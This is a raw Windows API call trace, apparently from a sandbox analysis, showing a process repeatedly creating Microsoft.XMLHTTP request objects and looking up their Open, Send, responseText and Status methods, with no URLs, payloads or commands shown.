	[0873.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.972] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.972] longjmp () 
	[0873.972] longjmp () 
	[0873.972] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.972] SysStringLen (param_1=0x0) returned 0x0
	[0873.972] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.973] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0873.973] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0873.973] ??2@YAPEAX_K@Z () returned 0x62f310
	[0873.973] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0873.973] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.973] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0873.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0873.973] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0873.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.973] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.974] longjmp () 
	[0873.974] longjmp () 
	[0873.974] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.974] SysStringLen (param_1=0x0) returned 0x0
	[0873.974] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.974] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0873.974] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0873.975] ??2@YAPEAX_K@Z () returned 0x62f330
	[0873.975] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0873.975] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.975] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0873.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0873.975] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0873.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.975] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.979] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0873.979] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0875.479] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0875.479] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0875.479] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0875.479] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0875.479] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0875.479] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0882.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0882.714] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0882.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0882.715] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.715] SysStringLen (param_1=0x0) returned 0x0
	[0882.715] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.716] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0882.716] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0882.716] ??2@YAPEAX_K@Z () returned 0x62f330
	[0882.716] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0882.716] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.716] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0882.716] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0882.716] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0882.718] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.718] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0882.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.721] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.721] SysStringLen (param_1=0x0) returned 0x0
	[0882.721] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.721] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0882.721] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0882.721] ??2@YAPEAX_K@Z () returned 0x62f310
	[0882.721] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0882.721] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.721] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0882.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0882.721] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0882.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.722] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0882.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.722] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.722] SysStringLen (param_1=0x0) returned 0x0
	[0882.722] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.722] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0882.722] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0882.722] ??2@YAPEAX_K@Z () returned 0x62f330
	[0882.722] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0882.722] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.722] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0882.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0882.722] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.723] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
